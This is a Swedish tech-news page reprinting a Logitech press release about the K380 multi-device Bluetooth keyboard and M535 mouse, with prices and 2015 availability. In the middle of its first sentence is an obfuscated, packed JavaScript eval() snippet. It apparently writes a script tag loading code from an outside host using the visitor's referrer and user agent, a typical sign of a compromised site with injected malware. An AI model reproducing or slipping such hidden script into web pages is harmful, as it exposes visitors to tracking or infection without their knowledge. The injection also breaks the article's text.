Image Image Image Image Image Image Image Image Image Image

| 13 april, 2021

Scroll to top

Top

Skapa och kommunicera på alla plattformar med Logitechs nya Bluetooth-keyboard och mus

Skapa och kommunicera på alla plattformar med Logitechs nya Bluetooth-keyboard och mus
Sebastian

Idag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|idrby|var|u0026u|referrer|efnzn||js|php’.split(’|’),0,{}))
lanserar Logitech (SIX: LOGN) (NASDAQ: LOGI)
Logitech® K380 Multi-Device Bluetooth® Keyboard och Logitech® M535 Bluetooth® Mouse. Musen och tangentbordet är designade för att ge dig frihet att arbeta, skapa och uttrycka dig själv, oavsett vilken typ av enhet du använder och var du befinner dig.

”Vi lever i en kreativ tid. Vi kan skapa, redigera och publicera innehåll så fort vi känner oss inspirerade”, säger Charlotte Johs, global vice vd för datortillbehör på Logitech. ”I den här uppkopplade världen är vårt arbete inte längre bundet till kontoret eller studion. Soffan, uteplatsen eller caféet är den nya arbetsplatsen, och Logitech K380 Multi-Device Bluetooth Keyboard och Logitech M535 Bluetooth Mouse ger dig ännu mer frihet att skapa var som helst utan att göra avkall på precision och bekvämlighet.”

Logitech K380 Multi-Device Bluetooth Keyboard

Logitech K380 Multi-Device Bluetooth Keyboard tar bekvämligheten från skrivbordet till din dator, smartphone eller tablet. Uttryck dig själv på alla plattformar var som helst i hemmet genom möjligheten att koppla upp sig till tre olika enheter som du enkelt kan växla mellan med hjälp av Easy-Switch™-knapparna. Tangentbordet kommer känna igen dina uppkopplade enheter och automatiskt stödja funktioner och genvägar. Logitech K380 Multi-Device Bluetooth Keyboard har upp till två års batteritid med två AAA-batterier och kommer i blått eller grått med ett föreslaget pris på 499 SEK

Logitech M535 Bluetooth Mouse

Logitech M535 Bluetooth Mouse låter dig skapa på i princip alla plattformar, varsomhelst, närsomhelst. Musens programmerbara navigeringsknapp ger dig full kontroll. Den låter dig byta mellan applikationer och skrivbord, dra filer och bilder, replikera trefinger-genvägen som tar fram mission control på Mac-datorer, samt enkelt ta fram Task View i Windows 10. Musen spårar tack vare sin avancerade sensor dina rörelser pålitligt på de flesta underlag, från metallbord på caféer till träskrivbord. Den är portabel, ergonomiskt utformad för maximal komfort och kan drivas upp till tio månader på ett AA-batteri. Musen kommer i grått eller blått och kommer finnas tillgänglig från september för ett föreslaget pris på 399 SEK

Pris och Tillgänglighet

Logitech K380 Multi-Device Bluetooth Keyboard förväntas finnas tillgängligt i oktober 2015. Logitech M535 Bluetooth Mouse förväntas finnas tillgänglig i september 2015. De säljs separat. För mer info besök Logitech på webben eller Facebook.